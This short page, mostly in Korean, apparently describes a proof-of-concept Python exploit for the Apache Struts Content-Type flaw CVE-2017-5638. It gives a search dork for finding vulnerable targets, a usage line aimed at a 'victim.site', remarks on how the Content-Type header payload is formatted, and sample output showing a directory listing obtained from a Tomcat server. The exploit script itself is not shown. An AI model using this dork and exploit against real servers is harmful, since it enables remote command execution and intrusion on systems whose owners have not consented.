
Example PoC Code for CVE-2017-5638 | Apache Struts Exploit
CVE-2017-5638용 예제 PoC 코드 | Apache Struts Exploit | DORK: ext:action
사용법: python struts.py https://victim.site dir
처음 게시된 Python 스크립트는 Content-Type 헤더를 올바르게 포맷하지 않았습니다. Content-Type 헤더를 다시 작성하여 Content-Type:%20{Exploit} 형식으로 올바르게 포맷했습니다. 또한 로깅과 Requests를 추가하고, Object Properties를 stdout으로 덤프했습니다.
샘플 출력
Check for CVE-2017-5638 by XSS.Cx
Volume in drive D has no label. Volume Serial Number is 2A7B-A245 Directory of d:\Program Files\Apache Software Foundation\Tomcat 9.0